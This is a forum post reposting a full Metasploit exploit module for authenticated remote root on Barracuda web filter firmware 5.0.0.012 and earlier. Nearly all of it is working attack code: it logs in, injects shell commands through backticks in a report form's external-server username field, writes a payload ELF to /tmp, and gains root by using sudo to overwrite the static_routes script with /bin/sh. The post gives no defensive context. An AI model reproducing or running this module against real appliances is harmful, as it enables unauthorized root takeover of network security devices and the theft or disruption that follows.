Jump to content
KhiZaRix

Barracuda Firmware 5.0.0.012 Post-Auth Remote Root

Recommended Posts

Posted (edited)

# Exploit Title: Barracuda Firmware <= 5.0.0.012 Post Auth Remote Root exploit

# Exploit Author: xort

# Vendor Homepage: https://www.barracuda.com/

# Software Link: https://www.barracuda.com/products/webfilter

# Version: Firmware <= 5.0.0.012

# Tested on: Vx and Hardware platforms

#

# Postauth remote root in Barracuda Firmware <= 5.0.0.012 for any under priviledged user with report generating

# capablities. This exploit leverages a command injection bug along with poor sudo permissions to obtain

# root. xort@blacksecurity.org

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Exploit::Remote::Tcp

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name' => 'Barracuda Firmware <= 5.0.0.012 reporting Post Auth Remote Root',

'Description' => %q{

This module exploits a remote command execution vulnerability in

the Barracuda Firmware Version <= 5.0.0.012 by exploiting a

vulnerability in the web administration interface.

By sending a specially crafted request it's possible to inject system

commands while escalating to root do to relaxed sudo configuration on the local

machine.

},

'Author' =>

[

'xort', # metasploit module

],

'Version' => '$Revision: 12345 $',

'References' =>

[

[ 'none', 'none'],

],

'Platform' => [ 'linux'],

'Privileged' => true,

'Arch' => [ ARCH_X86 ],

'SessionTypes' => [ 'shell' ],

'Privileged' => false,

'Payload' =>

{ # note: meterpreter can't run on host do to kernel 2.4 incompatibilities + this is stable

'Compat' =>

{

'ConnectionType' => 'find',

}

},

'Targets' =>

[

['Linux Universal',

{

'Arch' => ARCH_X86,

'Platform' => 'linux'

}

],

],

'DefaultTarget' => 0))

register_options(

[

OptString.new('PASSWORD', [ false, 'Device password', "" ]),

OptString.new('ET', [ false, 'Device password', "" ]),

OptString.new('USERNAME', [ true, 'Device password', "admin" ]),

OptString.new('CMD', [ false, 'Command to execute', "" ]),

Opt::RPORT(8000),

], self.class)

end

def do_login(username, password, et)

vprint_status( "Logging into machine with credentials...\n" )

# timeout

timeout = 1550;

# params

password_clear = "admin"

real_user = "";

login_state = "out"

enc_key = Rex::Text.rand_text_hex(32)

et = "1358817515"

locale = "en_US"

user = username

password = Digest::MD5.hexdigest(username+enc_key)

enctype = "MD5"

password_entry = ""

vprint_status( "Starting first routine...\n" )

data = "real_user=#{real_user}&login_state=#{login_state}&enc_key=#{enc_key}&et=#{et}&locale=#{locale}&user=#{user}&password=#{password}&enctype=#{enctype}&password_entry=#{password_entry}&password_clear=#{password_clear}&Submit=Login"

vprint_status( "#{data}\n" )

res = send_request_cgi(

{

'method' => 'POST',

'uri' => "/cgi-mod/index.cgi",

'cookie' => "",

'data' => data

}, timeout)

vprint_status( "login got code: #{res.code} ... continuing to second request..." )

File.open("/tmp/output2", 'w+') {|f| f.write(res.body) }

# get rid of first yank

password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result

et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0]

vprint_status( "password got back = #{password} - et got back = #{et}\n" )

return password, et

end

def run_command(username, password, et, cmd)

vprint_status( "Running Command...\n" )

exploitreq = [

[ "primary_tab", "BASIC" ],

[ "secondary_tab","reports" ],

[ "realm","" ],

[ "auth_type","Local" ],

[ "user", username ],

[ "password", password ],

[ "et",et ],

[ "role","" ],

[ "locale","en_US" ],

[ "q","" ],

[ "UPDATE_new_report_time_frame","custom" ],

[ "report_start","2013-01-25 01:14" ],

[ "report_end","2013-01-25 02:14" ],

[ "type","" ],

[ "ntlm_server","" ],

[ "kerb_server","" ],

[ "local_group","changeme" ],

[ "ip_group","20.20.108.0/0.0.0.0" ],

[ "ip_address__0","" ],

[ "ip_address__1","" ],

[ "ip_address__2","" ],

[ "ip_address__3","" ],

[ "netmask__0","" ],

[ "netmask__1","" ],

[ "netmask__2","" ],

[ "netmask__3","" ],

[ "UPDATE_new_report_pattern_values","" ],

[ "UPDATE_new_report_pattern_text","" ],

[ "UPDATE_new_report_filter_destination","domain" ],

[ "filter_domain","" ],

[ "UPDATE_new_report_filter_domain","" ],

[ "UPDATE_new_report_filter_category","" ],

[ "UPDATE_new_report_exclude_from","" ],

[ "UPDATE_new_report_exclude_to","" ],

[ "UPDATE_new_report_exclude_days","" ],

[ "allow","allow" ],

[ "block","block" ],

[ "warn","warn" ],

[ "monitor","monitor" ],

[ "UPDATE_new_report_filter_actions","allow,block,warn,monitor" ],

[ "UPDATE_new_report_filter_count","10" ],

[ "UPDATE_new_report_chart_type","vbar" ],

[ "UPDATE_new_report_format","html" ],

[ "DEFAULT_new_report_group_expand","No" ],

[ "UPDATE_new_report_expand_user_count","5" ],

[ "UPDATE_new_report_expand_domain_count","5" ],

[ "UPDATE_new_report_expand_cat_count","5" ],

[ "UPDATE_new_report_expand_url_count","5" ],

[ "UPDATE_new_report_expand_threat_count","5" ],

[ "report","on" ],

[ "UPDATE_new_report_name", Rex::Text.rand_text_alphanumeric(10) ],

[ "UPDATE_new_report_id","" ],

[ "UPDATE_new_report_enabled","Yes" ],

[ "secondary_scope","report" ],

[ "secondary_scope_data","" ],

[ "UPDATE_new_report_reports","sessions_by_user,infection_activity" ],

[ "UPDATE_new_report_delivery","external" ],

[ "UPDATE_new_report_delivery_dest_email","" ],

[ "UPDATE_new_report_server","new" ],

[ "UPDATE_new_external_server_type","smb" ],

[ "UPDATE_new_external_server_alias", Rex::Text.rand_text_alphanumeric(10) ],

[ "UPDATE_new_external_server","4.4.4.4" ],

[ "UPDATE_new_external_server_port","445" ],

[ "UPDATE_new_external_server_username","\"` #{cmd} `\"" ],

[ "UPDATE_new_external_server_password","asdf" ],

[ "UPDATE_new_external_server_path","/"+ Rex::Text.rand_text_alphanumeric(15) ],

[ "UPDATE_new_report_frequency", "once" ],

[ "UPDATE_new_report_split", "no" ],

[ "add_report_id","Apply" ],

[ "remover","" ]

]

data = Rex::MIME::Message.new

data.bound = "---------------------------" + Rex::Text.rand_text_numeric(30)

exploitreq.each do |xreq|

data.add_part(xreq[1], nil, nil, "form-data; name=\"" + xreq[0] + "\"")

end

post_data = data.to_s

post_data = post_data.gsub(/\r\n---------------------------/, "---------------------------")

datastore['UserAgent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"

vprint_status( "sending..." )

res = send_request_cgi({

'method' => 'POST',

'uri' => "/cgi-mod/index.cgi",

'ctype' => "multipart/form-data; boundary=#{data.bound}",

'data' => post_data,

'headers' =>

{

'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",

'Accept-Language' => "en-US,en;q=0.5"

}

})

if res.code == 200

vprint_status( "You can now reuse the login params you were supplied to avoid the lengthy wait at the exploits initial launch.... \n" )

vprint_status( "password: #{password} et: #{et}\n" )

end

vprint_status( "login got code: #{res.code} from report_results.cgi\n" )

File.open("/tmp/output4", 'w+') {|f| f.write(res.body) }

end

def run_script(username, password, et, cmds)

vprint_status( "running script...\n")

end

def exploit

# timeout

timeout = 1550;

user = "admin"

# params

real_user = "";

login_state = "out"

et = "1358817515" #epoch time

locale = "en_US"

user = "admin"

password = ""

enctype = "MD5"

password_entry = ""

password_clear = "admin"

vprint_status("<- Encoding payload to elf string...")

elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)

encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\\\\\\\\\x\1\2') # extra escaping to get passed down correctly

if not datastore['PASSWORD'].nil? and not datastore['PASSWORD'].empty?

password_clear = "admin"

password = datastore['PASSWORD']

et = datastore['ET']

# else - if no 'CMD' string - add code for root shell

else

password, et = do_login(user, password, et)

vprint_status("new password: #{password}\n")

end

sleep(5)

if not datastore['CMD'].nil? and not datastore['CMD'].empty?

cmd = datastore['CMD']

end

run_command(user, password, et, cmd)

# create elf in /tmp, abuse sudo to overwrite another command we have sudo access to (static routes scripts), then execute with sudo perm

cmd = "echo -ne #{encoded_elf} > /tmp/x ;"

cmd += "chmod +x /tmp/x ;"

# backup static_routes file

cmd += "cp -f /home/product/code/config/static_routes /tmp/zzz"

cmd += "sudo cp -f /bin/sh /home/product/code/config/static_routes"

# execute elf as root

cmd += "sudo /home/product/code/config/static_routes -c /tmp/x ;"

# restore static_routes file

cmd += "cp -f /tmp/zzz /home/product/code/config/static_routes"

run_command(user, password, et, cmd)

sleep(2)

handler

sleep(5)

end

end

Source: http://packetstorm.wowhacker.com/1504-exploits/barracuda_5x_reports_postauth_root_exploit.rb.txt

Edited by KhiZaRix

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...